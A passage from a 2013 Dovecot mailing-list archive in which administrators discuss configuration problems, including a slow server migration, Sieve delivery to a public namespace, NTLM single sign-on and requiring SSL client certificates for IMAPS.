? Or could anyone tell me how to do it? I am having an email Server up and running with openldap but want to change to Samba4 AD, because of the openchange Integration. I would appreciate any help on this topic. -- Mit freundlichem Gru? Carsten Laun-De Lellis Hauptstrasse 13 D-67705 Trippstadt Phone: +49 6306 992140 Fax: +49 6306 992142 Mobile: +49 151 27530865 email: carsten.delellis at delellis.net http://www.linkedin.com/in/carstenlaundelellis [1] Links: ------ [1] http://www.linkedin.com/in/carstenlaundelellis From davide.marchi at mail.cgilfe.it Fri Jun 28 09:50:33 2013 From: davide.marchi at mail.cgilfe.it (Davide) Date: Fri, 28 Jun 2013 08:50:33 +0200 Subject: [Dovecot] traffic statistics (collectd / rrdtool) In-Reply-To: <51CCA3A4.1070308@nybeta.com> References: <51CCA3A4.1070308@nybeta.com> Message-ID: <51CD3239.3050400@mail.cgilfe.it> In Timo' scripts there is also reference to tab-formatter.pl which is an extra script downlodable from http://www.dovecot.org/tools/ Il 27/06/2013 22:42, Thomas Harold ha scritto: > On 9/28/2010 3:34 AM, Martin Waschb?sch wrote: >> Am 26.09.2010 um 08:30 schrieb Mohit Chawla: >> >>> How about collectd ( http://collectd.org/ ) ? >>> >> Looks like a good package, but I could not find a dovecot plugin? If >> you know of such an extension, that'd be awesome! >> >> Martin >> > > (Since I'm setting up collectd this week, I'll resurrect this thread.) > > My guess is that you could re-use something similar to the one that I > found for postfix tracking. It uses the 'tail' plugin of collectd and > watches the /var/log/maillog file (on CentOS/RHEL). > > https://github.com/creckx/CollectdGraphs/blob/master/collectd_graphs/doc/collectd.postfix.conf > > > Timo also posted two scripts last year, which I have yet to play with: > >> I wrote two scripts, which you can use with the stats plugin enabled >> to get a better "doveadm stats top" than it currently is: >> >> http://dovecot.org/tools/stats-top.pl >> http://dovecot.org/tools/stats.pl > > Mostly I'm looking for a way to track the number of connections in use. > > From fabio.ferrari at unimore.it Fri Jun 28 13:28:13 2013 From: fabio.ferrari at unimore.it (FABIO FERRARI) Date: Fri, 28 Jun 2013 12:28:13 +0200 Subject: [Dovecot] Dovecot SLOW in imaptest without any apparent reason Message-ID: Hello, I'm migrating a mail server from a centos 5 cluster architecture to a centos 6 cluster architecture. The new cluster involves faster machines then the old cluster, and a virtual machine. I use dovecot-2.0.9-5.el6.x86_64, while the old cluster uses dovecot-2.0.1-1_118.el5. Tha mail server uses mysql for the users database, and a local ldap for authentication. The storage is also much faster in the new cluster: OLD SERVER: date; dd if=/dev/zero of=/cl/prova.bin bs=102400 count=10240; sync; date Wed Jun 26 15:43:53 CEST 2013 10240+0 records in 10240+0 records out 1048576000 bytes (1.0 GB) copied, 30.0202 seconds, 34.9 MB/s Wed Jun 26 15:44:28 CEST 2013 --> 1GB / 35 secs = about 29.25 MB/sec NEW SERVER: date; dd if=/dev/zero of=/cl/prova.bin bs=102400 count=102400; sync; date mar 25 giu 2013, 15.46.36, CEST 102400+0 records in 102400+0 records out 10485760000 bytes (10 GB) copied, 62,5143 s, 168 MB/s mar 25 giu 2013, 15.48.33, CEST [root at eta ~]# ---> 10GB / 117secs = about 85.47MB/sec An 'ls -l' in the user direcotry is also much faster, when the ldap/sssd cache is populated: OLD SERVER: real 0m8.540s user 0m1.229s sys 0m0.699s NEW SERER: real 0m3.938s user 0m0.250s sys 0m0.151s But my imaptest is much slower: ./imaptest user=XXXXXXX pass=XXXXXXX secs=120 seed=123 mbox=./dovecot-crlf OLD SERVER: Totals: Logi List Stat Sele Fetc Fet2 Stor Dele Expu Appe Logo 100% 50% 50% 100% 100% 100% 50% 100% 100% 100% 100% 30% 5% 1122 559 547 1121 1121 1568 136 900 1121 1121 2244 NEW SERVER Totals: Logi List Stat Sele Fetc Fet2 Stor Dele Expu Appe Logo 100% 50% 50% 100% 100% 100% 50% 100% 100% 100% 100% 30% 5% 390 210 185 389 389 589 49 320 389 389 780 The configuration is exactly the same in the 2 clusters, that is: ----------- # 2.0.1: /etc/dovecot/dovecot.conf # OS: Linux 2.6.18-348.3.1.el5 x86_64 Red Hat Enterprise Linux Server release 5.9 (Tikanga) xfs auth_cache_size = 1024 auth_cache_ttl = 21600 s auth_debug = yes auth_debug_passwords = yes auth_master_user_separator = * auth_mechanisms = plain login auth_socket_path = /var/run/dovecot/auth-userdb auth_verbose = yes base_dir = /var/run/dovecot/ disable_plaintext_auth = no hostname = mail.unimore.it info_log_path = /var/log/dovecot.log lda_mailbox_autocreate = yes log_path = /var/log/dovecot.log mail_debug = yes mail_location = maildir:/cl/mail/vhosts/sms.unimo.it/%Ln/Maildir mail_plugins = $mail_plugins quota mailbox_idle_check_interval = 60 s mbox_write_locks = fcntl namespace { inbox = yes location = prefix = INBOX. separator = . type = private } passdb { args = /usr/local/etc/dovecot.masterusers driver = passwd-file master = yes } passdb { args = dovecot driver = pam } plugin { quota = maildir:User quota quota_exceeded_message = Quota exceeded (mailbox is full) quota_rule = *:storage=200MB quota_rule2 = *:messages=100000 quota_rule3 = INBOX.Trash:storage=+100M quota_warning = storage=90%% quota-warning 90 %u quota_warning2 = storage=85%% quota-warning 85 %u quota_warning3 = messages=95%% quota-warning 95 %u quota_warning4 = messages=80%% quota-warning 80 %u setting_name = quota } postmaster_address = postmaster at unimore.it quota_full_tempfail = yes service anvil { client_limit = 199999 process_limit = 1 } service auth { client_limit = 21224 unix_listener auth-userdb { mode = 0600 user = vmail } } service imap-login { inet_listener imap { port = 143 } inet_listener imaps { port = 993 } process_limit = 10000 } service imap { process_limit = 10000 } service pop3-login { inet_listener pop3 { port = 110 } inet_listener pop3s { port = 995 } } service pop3 { process_limit = 1024 } service quota-warning { executable = script /usr/local/bin/quota-warning.sh unix_listener quota-warning { group = vmail user = vmail } user = dovecot } ssl_ca = I've been trying to compile the latest version of dovecot-antispam, and it doesn't work, the latest patch fixes compilation for dovecot versions greater than 2.1.16 but the packaged version in debian is 2.1.7 and doesn't provide the DOVECOT_PREREQ macro. It seems there are some solutions: 1) Rollback to the last working version so it can be used on wheezy 2) Open a bug report in debian to see if they can backport the macro here ( http://www.dovecot.org/list/dovecot-cvs/2013-March/022903.html) 3) Use the packaged version from debian 4) .. What's your opinion? From ef at math.uni-bonn.de Fri Jun 28 15:51:49 2013 From: ef at math.uni-bonn.de (Edgar =?iso-8859-1?B?RnXf?=) Date: Fri, 28 Jun 2013 14:51:49 +0200 Subject: [Dovecot] Zero-sized Maildir files on over-quota In-Reply-To: <1287493163.6536.66.camel@kurkku.sapo.corppt.com> References: <20101005132934.GE23076@orion.math.uni-bonn.de> <1287074927.1752.96.camel@kurkku.sapo.corppt.com> <20101015092944.GK1118@orion.math.uni-bonn.de> <6E6C2646-B639-4AAF-9BF4-AC84E2EDD992@iki.fi> <20101015160346.GB16349@gumme.math.uni-bonn.de> <1287162607.442.35.camel@kurkku.sapo.corppt.com> <20101019114204.GF2666@orion.math.uni-bonn.de> <1287493163.6536.66.camel@kurkku.sapo.corppt.com> Message-ID: <20130628125148.GE69372@trav.math.uni-bonn.de> > I'm still thinking this has more to do with your system than anything in > Dovecot. Yes. We were finally able to reliably reproduce this. It looks like a strange bug in NetBSD's NFS: If you are over quota and write a small amount (probably less tha an NFS block) of data, the write() call will succeed and a following fsync() (or close()) will fail. However, when you insert a utimes() or futimes() call after the write(), the fsync()/close() will report success. I didn't dig into when Dovecot does that utimes() call, but it sometimes does and sometimes doesn't, explaining our problems to reproduce the bug. From AxelLuttgens at swing.be Fri Jun 28 15:56:09 2013 From: AxelLuttgens at swing.be (Axel Luttgens) Date: Fri, 28 Jun 2013 14:56:09 +0200 Subject: [Dovecot] Dovecot 2.2.4 - Fatal: master: service(imap): child 44562 killed with signal 11 In-Reply-To: <51CACD85.80006@mejor.pl> References: <51CACD85.80006@mejor.pl> Message-ID: Le 26 juin 2013 ? 13:16, Marcin Miros?aw a ?crit : > Hi all! > I just upgraded dovecot from 2.2.2 to 2.2.4. Now I can't login to imap, > proces imap throws segfault. Here is snip from dovecot.log: > > [...] > 2013-06-25T23:06:47.827616+02:00 meteor dovecot: imap(marcin at mejor.pl) > : Warning: autocreate plugin is > deprecated, use mailbox { auto } setting instead > [...] Hello Marcin, Perhaps is it worth to try what the log suggests? IIRC, it's quite a long time now that autocreate's deprecation has been announced. HTH, Axel From tlx at leuxner.net Fri Jun 28 16:37:34 2013 From: tlx at leuxner.net (Thomas Leuxner) Date: Fri, 28 Jun 2013 15:37:34 +0200 Subject: [Dovecot] namespace delivery question In-Reply-To: <20130627115159.M11417@madalbal.hu> References: <20130627115159.M11417@madalbal.hu> Message-ID: <20130628133734.GA25817@nihlus.leuxner.net> * Laszlo Kiraly 2013.06.27 14:20: > I couldn't find solution in the documentation, how can I manage the email > delivery to the public namespace? [...] > namespace { > location = sdbox:/home/vmail/public/%u > prefix = public. > separator = . > subscriptions = no > type = public > } You can use sieve for that with LMTP: if address :is ["To","CC"] "someone at domain.tld" { fileinto "Public.Mailbox.Folder"; } I personally use / separators so not 100% the syntax applies to your scenario. Thomas -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: Digital signature URL: From marcin at mejor.pl Fri Jun 28 16:48:08 2013 From: marcin at mejor.pl (=?UTF-8?B?TWFyY2luIE1pcm9zxYJhdw==?=) Date: Fri, 28 Jun 2013 15:48:08 +0200 Subject: [Dovecot] Dovecot 2.2.4 - Fatal: master: service(imap): child 44562 killed with signal 11 In-Reply-To: References: <51CACD85.80006@mejor.pl> Message-ID: <51CD9418.4020407@mejor.pl> W dniu 28.06.2013 14:56, Axel Luttgens pisze: > Le 26 juin 2013 ? 13:16, Marcin Miros?aw a ?crit : > >> Hi all! >> I just upgraded dovecot from 2.2.2 to 2.2.4. Now I can't login to imap, >> proces imap throws segfault. Here is snip from dovecot.log: >> >> [...] >> 2013-06-25T23:06:47.827616+02:00 meteor dovecot: imap(marcin at mejor.pl) >> : Warning: autocreate plugin is >> deprecated, use mailbox { auto } setting instead >> [...] > > Hello Marcin, Hi Axel, > Perhaps is it worth to try what the log suggests? Perhaps you are right:) But I don't suspect that throwing segfaults is the best way to remind about it;) > IIRC, it's quite a long time now that autocreate's deprecation has been announced. I have fixed configuration. Sadly, dovecot still throws segfaults. Regards! Marcin From l.kiraly at madalbal.hu Fri Jun 28 16:51:17 2013 From: l.kiraly at madalbal.hu (Laszlo Kiraly) Date: Fri, 28 Jun 2013 15:51:17 +0200 Subject: [Dovecot] namespace delivery question In-Reply-To: <20130628133734.GA25817@nihlus.leuxner.net> References: <20130627115159.M11417@madalbal.hu> <20130628133734.GA25817@nihlus.leuxner.net> Message-ID: <20130628135117.M29325@madalbal.hu> Hi Thomas, Thank you for your answer. I'm happy with / separators too so I changed them. Will it work too if I rewrite "rcpt to" at transport time in exim? For example: info at domain.com -> Public/info at domain.com I have a file with email addresses for exim to distinguish public mails. In this way I could avoid double adjustments and checks. Best regards: Kir?ly L?szl? ---------- Original Message ----------- From: Thomas Leuxner To: dovecot at dovecot.org Sent: Fri, 28 Jun 2013 15:37:34 +0200 Subject: Re: [Dovecot] namespace delivery question > * Laszlo Kiraly 2013.06.27 14:20: > > > I couldn't find solution in the documentation, how can I manage the email > > delivery to the public namespace? > [...] > > namespace { > > location = sdbox:/home/vmail/public/%u > > prefix = public. > > separator = . > > subscriptions = no > > type = public > > } > > You can use sieve for that with LMTP: > > if address :is ["To","CC"] "someone at domain.tld" > { > fileinto "Public.Mailbox.Folder"; > } > > I personally use / separators so not 100% the syntax applies to your > scenario. > > Thomas ------- End of Original Message ------- From tlx at leuxner.net Fri Jun 28 17:18:09 2013 From: tlx at leuxner.net (Thomas Leuxner) Date: Fri, 28 Jun 2013 16:18:09 +0200 Subject: [Dovecot] namespace delivery question In-Reply-To: <20130628135117.M29325@madalbal.hu> References: <20130627115159.M11417@madalbal.hu> <20130628133734.GA25817@nihlus.leuxner.net> <20130628135117.M29325@madalbal.hu> Message-ID: <20130628141809.GB25817@nihlus.leuxner.net> * Laszlo Kiraly 2013.06.28 15:51: > Will it work too if I rewrite "rcpt to" at transport time in exim? > > For example: info at domain.com -> Public/info at domain.com I only tried via sieve so far. Logic however tells me redirection/storage needs to occur after the LMTP stage, so I'd doubt that syntax would work. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: Digital signature URL: From me at junc.eu Fri Jun 28 18:23:57 2013 From: me at junc.eu (Benny Pedersen) Date: Fri, 28 Jun 2013 17:23:57 +0200 Subject: [Dovecot] Issues when compiling dovecot antispam on debian wheezy In-Reply-To: References: Message-ID: <29cb5fb89dc2218203d5e61c19c78522@junc.eu> Joan skrev den 2013-06-28 12:38: > What's your opinion? apt-get source dovecot-antispam -b fails ? if so make a bugreport for dovecot-antispam, not specific a debian problem then, but do reference what debian have in your install -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From mariajose1982 at gmail.com Fri Jun 28 22:29:04 2013 From: mariajose1982 at gmail.com (=?ISO-8859-1?Q?Maria_Jose_Ya=F1ez_Dacosta?=) Date: Fri, 28 Jun 2013 16:29:04 -0300 Subject: [Dovecot] Passdb + single sing on + NTLM + Thunderbird. In-Reply-To: <51CCD1B9.3010307@hardwarefreak.com> References: <51CB5C7B.90606@hardwarefreak.com> <51CCD1B9.3010307@hardwarefreak.com> Message-ID: Thank you very much for the reply :) I try with that. 2013/6/27 Stan Hoeppner > On 6/27/2013 7:48 AM, Maria Jose Ya?ez Dacosta wrote: > > Thanks!!. > > I have a little question, > > This page explains AUTH = GSSAPI but I'm interested in AUTH = NTLM. > > I want to get single sign on with clients in Windows against a Windows > > Active Directory. > > For NTLM should use another library like pam_krb5.so? > > Sorry for so many questions and thanks again > > http://wiki2.dovecot.org/Authentication/Mechanisms/Winbind > http://wiki2.dovecot.org/Authentication/Mechanisms/NTLM > > > 2013/6/26 Stan Hoeppner > > > >> On 6/26/2013 1:17 PM, Maria Jose Ya?ez Dacosta wrote: > >> > >>> I want to use single sign on from Windows with Thunderbird or Outlook > >> using > >>> NTLM. > >> > >> http://wiki2.dovecot.org/Authentication/Kerberos > > -- Maria Jos? From irek.szczesniak at gmail.com Sat Jun 29 00:31:03 2013 From: irek.szczesniak at gmail.com (=?UTF-8?B?SXJlbmV1c3ogU3pjemXFm25pYWs=?=) Date: Fri, 28 Jun 2013 23:31:03 +0200 Subject: [Dovecot] IMAPS: Disable SSL connection without client certificate Message-ID: <51CE0097.90207@gmail.com> I've been using Dovecot 2.1.8 on OpenBSD 5.2 i386 for about a month. It works great. Dovecot serves IMAPS only, and I'm using Thunderbird to access my mail. I configured Dovecot to allow clients that present a valid certificate when establishing SSL connection. I configure my Thunderbird for SSL/TLS connection with normal password. It works fine. However, with my config anybody can connect to my server without presenting a certificate: > openssl s_client -connect server:993 > (...) > * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS > ID ENABLE IDLE AUTH=PLAIN] Dovecot ready. Luckily, after connecting without a certificate logging fails: > a001 login iszczesniak password > a001 NO [ALERT] Client didn't present valid SSL certificate *QUESTION: Is there a way in Dovecot to disable establishing an SSL connection without a client certificate?* My complete config is : # dovecot -n # 2.1.8: /etc/dovecot/dovecot.conf # OS: OpenBSD 5.2 i386 auth_ssl_require_client_cert = yes mail_location = maildir:~/archive/mail mbox_write_locks = fcntl mmap_disable = yes namespace inbox { inbox = yes location = mailbox Drafts { special_use = \Drafts } mailbox Sent { special_use = \Sent } mailbox Trash { special_use = \Trash } prefix = } passdb { driver = bsdauth } protocols = imap service imap-login { inet_listener imap { port = 0 } } ssl_ca = References: <51CE0097.90207@gmail.com> Message-ID: <51CE017A.4000404@thelounge.net> Am 28.06.2013 23:31, schrieb Ireneusz Szcze?niak: > I've been using Dovecot 2.1.8 on OpenBSD 5.2 i386 for about a month. It works great. Dovecot serves IMAPS only, > and I'm using Thunderbird to access my mail. > > I configured Dovecot to allow clients that present a valid certificate when establishing SSL connection. I > configure my Thunderbird for SSL/TLS connection with normal password. It works fine. > > However, with my config anybody can connect to my server without presenting a certificate google "dovecot ssl client certificate" leads to http://wiki.dovecot.org/SSL/DovecotConfiguration well, this is for dovecot 1.x, but have you tried it? Client certificate verification/authentication If you want to require clients to present a valid SSL certificate, you'll need these settings: ssl_ca_file = /etc/ssl/ca.pem ssl_verify_client_cert = yes auth default { ssl_require_client_cert = yes .. } -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From irek.szczesniak at gmail.com Sat Jun 29 09:38:29 2013 From: irek.szczesniak at gmail.com (=?UTF-8?B?SXJlbmV1c3ogU3pjemXFm25pYWs=?=) Date: Sat, 29 Jun 2013 08:38:29 +0200 Subject: [Dovecot] IMAPS: Disable SSL connection without client certificate In-Reply-To: <51CE017A.4000404@thelounge.net> References: <51CE0097.90207@gmail.com> <51CE017A.4000404@thelounge.net> Message-ID: <51CE80E5.3050509@gmail.com> Thanks for your email. Yes, I looked before at that website before. I'm using these options with Dovecot 2.1.8, among others: auth_ssl_require_client_cert = yes ssl_verify_client_cert = yes ssl_ca = > Am 28.06.2013 23:31, schrieb Ireneusz Szcze?niak: >> I've been using Dovecot 2.1.8 on OpenBSD 5.2 i386 for about a month. It works great. Dovecot serves IMAPS only, >> and I'm using Thunderbird to access my mail. >> >> I configured Dovecot to allow clients that present a valid certificate when establishing SSL connection. I >> configure my Thunderbird for SSL/TLS connection with normal password. It works fine. >> >> However, with my config anybody can connect to my server without presenting a certificate > > google "dovecot ssl client certificate" leads to > http://wiki.dovecot.org/SSL/DovecotConfiguration > > well, this is for dovecot 1.x, but have you tried it? > > Client certificate verification/authentication > If you want to require clients to present a valid SSL certificate, you'll need these settings: > > ssl_ca_file = /etc/ssl/ca.pem > ssl_verify_client_cert = yes > auth default { > ssl_require_client_cert = yes > .. > } -- Ireneusz (Irek) Szczesniak http://www.irkos.org From kiru at madalbal.hu Fri Jun 28 16:50:59 2013 From: kiru at madalbal.hu (Kiraly Laszlo) Date: Fri, 28 Jun 2013 15:50:59 +0200 Subject: [Dovecot] namespace delivery question In-Reply-To: <20130628133734.GA25817@nihlus.leuxner.net> References: <20130627115159.M11417@madalbal.hu> <20130628133734.GA25817@nihlus.leuxner.net> Message-ID: <20130628134338.M32658@madalbal.hu> Hi Thomas, Thank you for your answer. I'm happy with / separators too so I changed them. Will it work too if I rewrite "rcpt to" at transport time in exim? For example: info at domain.com -> Public/info at domain.com I have a file with email addresses for exim to distinguish public mails. In this way I could avoid double adjustments and checks. Best regards: Kir?ly L?szl? ---------- Original Message ----------- From: Thomas Leuxner To: dovecot at dovecot.org Sent: Fri, 28 Jun 2013 15:37:34 +0200 Subject: Re: [Dovecot] namespace delivery question > * Laszlo Kiraly 2013.06.27 14:20: > > > I couldn't find solution in the documentation, how can I manage the email > > delivery to the public namespace? > [...] > > namespace { > > location = sdbox:/home/vmail/public/%u > > prefix = public. > > separator = . > > subscriptions = no > > type = public > > } > > You can use sieve for that with LMTP: > > if address :is ["To","CC"] "someone at domain.tld" > { > fileinto "Public.Mailbox.Folder"; > } > > I personally use / separators so not 100% the syntax applies to your > scenario. > > Thomas ------- End of Original Message ------- From lbinotto at hotmail.com Fri Jun 28 23:21:10 2013 From: lbinotto at hotmail.com (Luis Binotto HOTMAIL) Date: Fri, 28 Jun 2013 15:51:10 -0430 Subject: [Dovecot] Passdb + single sing on + NTLM + Thunderbird. In-Reply-To: References: <51CB5C7B.90606@hardwarefreak.com><51CCD1B9.3010307@hardwarefreak.com> Message-ID: Hello I have configured Dovecot against AD, using outlook with NTLM and is working like a charm... Try the following this link... http://wiki.dovecot.org/HowTo/ActiveDirectoryNtlm I hope this will help you... -----Original Message----- From: dovecot-bounces at dovecot.org [mailto:dovecot-bounces at dovecot.org] On Behalf Of Maria Jose Ya?ez Dacosta Sent: viernes, 28 de junio de 2013 02:59 p.m. To: Dovecot Mailing List Subject: Re: [Dovecot] Passdb + single sing on + NTLM + Thunderbird. "Notificaci?n Autom?tica: Este mensaje ha sido recibido desde la Internet, no se garantiza la autenticidad del remitente. " Thank you very much for the reply :) I try with that. 2013/6/27 Stan Hoeppner > On 6/27/2013 7:48 AM, Maria Jose Ya?ez Dacosta wrote: > > Thanks!!. > > I have a little question, > > This page explains AUTH = GSSAPI but I'm interested in AUTH = NTLM. > > I want to get single sign on with clients in Windows against a > > Windows Active Directory. > > For NTLM should use another library like pam_krb5.so? > > Sorry for so many questions and thanks again > > http://wiki2.dovecot.org/Authentication/Mechanisms/Winbind > http://wiki2.dovecot.org/Authentication/Mechanisms/NTLM > > > 2013/6/26 Stan Hoeppner > > > >> On 6/26/2013 1:17 PM, Maria Jose Ya?ez Dacosta wrote: > >> > >>> I want to use single sign on from Windows with Thunderbird or > >>> Outlook > >> using > >>> NTLM. > >> > >> http://wiki2.dovecot.org/Authentication/Kerberos > > -- Maria Jos? From l.kiraly at madalbal.hu Sat Jun 29 22:16:04 2013 From: l.kiraly at madalbal.hu (Laszlo Kiraly) Date: Sat, 29 Jun 2013 21:16:04 +0200 Subject: [Dovecot] namespace delivery question In-Reply-To: <20130628133734.GA25817@nihlus.leuxner.net> References: <20130627115159.M11417@madalbal.hu> <20130628133734.GA25817@nihlus.leuxner.net> Message-ID: <20130629184638.M19581@madalbal.hu> Okay, I have this in the config: --- namespace { type = public prefix = public/ separator = / location = sdbox:/home/vmail/public/%u subscriptions = no } --- And "sieve_before = /home/vmail/sieve/" My sieve script here: --- require "fileinto"; if address :is ["To","CC"] "info at domain.com" { fileinto "public/info"; } --- I compiled it with sievec. If I send mail to info at domain.com I get " failed to store into mailbox 'public/info': Mailbox doesn't exist: info", and dovecot stores the mail in the private namespace. I have --- userdb { driver = static args = uid=1035 gid=8 home=/home/vmail/%Ln allow_all_users=yes } --- where allow_all_users=yes theoretically makes mailboxes automatically. I tried to create this mailbox manually but "doveadm mailbox create public/info" makes mailbox under /home/vmail/public/root/mailboxes/info/ which isn't, what I want. What can I do? My log: --- Jun 29 20:54:26 test dovecot: lmtp(15045): Debug: Module loaded: /usr/lib/dovecot/modules/lib90_sieve_plugin.so Jun 29 20:54:26 test dovecot: lmtp(15045): Debug: auth input: info uid=1035 gid=8 home=/home/vmail/info Jun 29 20:54:26 test dovecot: lmtp(15045): Debug: changed username to info Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: Effective uid=1035, gid=8, home=/home/vmail/info Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: Namespace inbox: type=private, prefix=, sep=/, inbox=yes, hidden=no, list=yes, subscriptions=yes location=sdbox: /home/vmail/info Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: fs: root=/home/vmail/info, index=, control=, inbox=, alt= Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: Namespace : /home/vmail/info doesn't exist yet, using default permissions Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: Namespace : Using permissions from /home/vmail/info: mode=0700 gid=-1 Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: Namespace : type=public, prefix=public/, sep=/, inbox=no, hidden=no, list=yes, subscriptions=no location=sdbox:/ home/vmail/public/info Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: fs: root=/home/vmail/public/info, index=, control=, inbox=, alt= Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: Namespace public/: /home/vmail/public/info doesn't exist yet, using default permissions Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: Namespace public/: Using permissions from /home/vmail/public/info: mode=0700 gid=-1 Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: sieve: include: sieve_global_dir is not set; it is currently not possible to include `:global' scripts. Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: kQGGCmItz1HFOgAAaS8hrw: sieve: script file /home/vmail/info/.dovecot.sieve not found Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: kQGGCmItz1HFOgAAaS8hrw: sieve: user's script /home/vmail/info/.dovecot.sieve doesn't exist (using default script location instead) Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: kQGGCmItz1HFOgAAaS8hrw: sieve: no default script configured for user Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: kQGGCmItz1HFOgAAaS8hrw: sieve: user has no valid location for a personal script Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: kQGGCmItz1HFOgAAaS8hrw: sieve: executed before user's personal Sieve script(1): /home/vmail/sieve/global.sieve Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: kQGGCmItz1HFOgAAaS8hrw: sieve: opening script /home/vmail/sieve/global.sieve Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: kQGGCmItz1HFOgAAaS8hrw: sieve: script binary /home/vmail/sieve/global.svbin successfully loaded Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: kQGGCmItz1HFOgAAaS8hrw: sieve: binary save: not saving binary /home/vmail/sieve/global.svbin, because it is alre ady stored Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: kQGGCmItz1HFOgAAaS8hrw: sieve: executing script from /home/vmail/sieve/global.svbin Jun 29 20:54:26 test dovecot: lmtp(15045, info): Error: kQGGCmItz1HFOgAAaS8hrw: sieve: msgid=: failed to store into mailbox 'public/info': Mailbox doesn't exist: info Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: Namespace : /home/vmail/info/mailboxes/INBOX doesn't exist yet, using default permissions Jun 29 20:54:26 test dovecot: lmtp(15045, info): Debug: Namespace : Using permissions from /home/vmail/info: mode=0700 gid=-1 Jun 29 20:54:26 test dovecot: lmtp(15045, info): kQGGCmItz1HFOgAAaS8hrw: sieve: msgid=: stored mail into mailbox 'INBOX' Jun 29 20:54:26 test dovecot: lmtp(15045, info): Error: kQGGCmItz1HFOgAAaS8hrw: sieve: execution of script /home/vmail/sieve/global.sieve failed, but implicit keep was successful Jun 29 20:54:26 test dovecot: lmtp(15045): Disconnect from local: Client quit (in reset) --- ---------- Original Message ----------- From: Thomas Leuxner To: dovecot at dovecot.org Sent: Fri, 28 Jun 2013 15:37:34 +0200 Subject: Re: [Dovecot] namespace delivery question > * Laszlo Kiraly 2013.06.27 14:20: > > > I couldn't find solution in the documentation, how can I manage the email > > delivery to the public namespace? > [...] > > namespace { > > location = sdbox:/home/vmail/public/%u > > prefix = public. > > separator = . > > subscriptions = no > > type = public > > } > > You can use sieve for that with LMTP: > > if address :is ["To","CC"] "someone at domain.tld" > { > fileinto "Public.Mailbox.Folder"; > } > > I personally use / separators so not 100% the syntax applies to your > scenario. > > Thomas ------- End of Original Message ------- From irek.szczesniak at gmail.com Sat Jun 29 22:54:38 2013 From: irek.szczesniak at gmail.com (=?UTF-8?B?SXJlbmV1c3ogU3pjemXFm25pYWs=?=) Date: Sat, 29 Jun 2013 21:54:38 +0200 Subject: [Dovecot] IMAPS: Disable SSL connection without client certificate In-Reply-To: <51CE017A.4000404@thelounge.net> References: <51CE0097.90207@gmail.com> <51CE017A.4000404@thelounge.net> Message-ID: <51CF3B7E.5020800@gmail.com> Reindl, thanks again for your email, but now I realize that perhaps you misunderstood my problem. I have got the SSL working with the config presented in my first post. The problem is that I'm surprised that Dovecot lets clients establish an SSL connection even when the client doesn't present a certificate. I don't want clients without a valid certificate even establish an SSL connection. On 28.06.2013 23:34, Reindl Harald wrote: > Am 28.06.2013 23:31, schrieb Ireneusz Szcze?niak: >> I've been using Dovecot 2.1.8 on OpenBSD 5.2 i386 for about a month. It works great. Dovecot serves IMAPS only, >> and I'm using Thunderbird to access my mail. >> >> I configured Dovecot to allow clients that present a valid certificate when establishing SSL connection. I >> configure my Thunderbird for SSL/TLS connection with normal password. It works fine. >> >> However, with my config anybody can connect to my server without presenting a certificate > > google "dovecot ssl client certificate" leads to > http://wiki.dovecot.org/SSL/DovecotConfiguration > > well, this is for dovecot 1.x, but have you tried it? > > Client certificate verification/authentication > If you want to require clients to present a valid SSL certificate, you'll need these settings: > > ssl_ca_file = /etc/ssl/ca.pem > ssl_verify_client_cert = yes > auth default { > ssl_require_client_cert = yes > .. > } -- Ireneusz (Irek) Szczesniak http://www.irkos.org From h.reindl at thelounge.net Sat Jun 29 23:03:57 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Sat, 29 Jun 2013 22:03:57 +0200 Subject: [Dovecot] IMAPS: Disable SSL connection without client certificate In-Reply-To: <51CF3B7E.5020800@gmail.com> References: <51CE0097.90207@gmail.com> <51CE017A.4000404@thelounge.net> <51CF3B7E.5020800@gmail.com> Message-ID: <51CF3DAD.9000509@thelounge.net> Am 29.06.2013 21:54, schrieb Ireneusz Szcze?niak: > Reindl, thanks again for your email, but now I realize that perhaps you misunderstood my problem. I have got the > SSL working with the config presented in my first post. The problem is that I'm surprised that Dovecot lets > clients establish an SSL connection even when the client doesn't present a certificate. I don't want clients > without a valid certificate even establish an SSL connection. what the hell - you can reject them after not present a cert but how do you imagine technically to smell this fact before connect? > On 28.06.2013 23:34, Reindl Harald wrote: > >> Am 28.06.2013 23:31, schrieb Ireneusz Szcze?niak: >>> I've been using Dovecot 2.1.8 on OpenBSD 5.2 i386 for about a month. It works great. Dovecot serves IMAPS only, >>> and I'm using Thunderbird to access my mail. >>> >>> I configured Dovecot to allow clients that present a valid certificate when establishing SSL connection. I >>> configure my Thunderbird for SSL/TLS connection with normal password. It works fine. >>> >>> However, with my config anybody can connect to my server without presenting a certificate >> >> google "dovecot ssl client certificate" leads to >> http://wiki.dovecot.org/SSL/DovecotConfiguration >> >> well, this is for dovecot 1.x, but have you tried it? >> >> Client certificate verification/authentication >> If you want to require clients to present a valid SSL certificate, you'll need these settings -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: 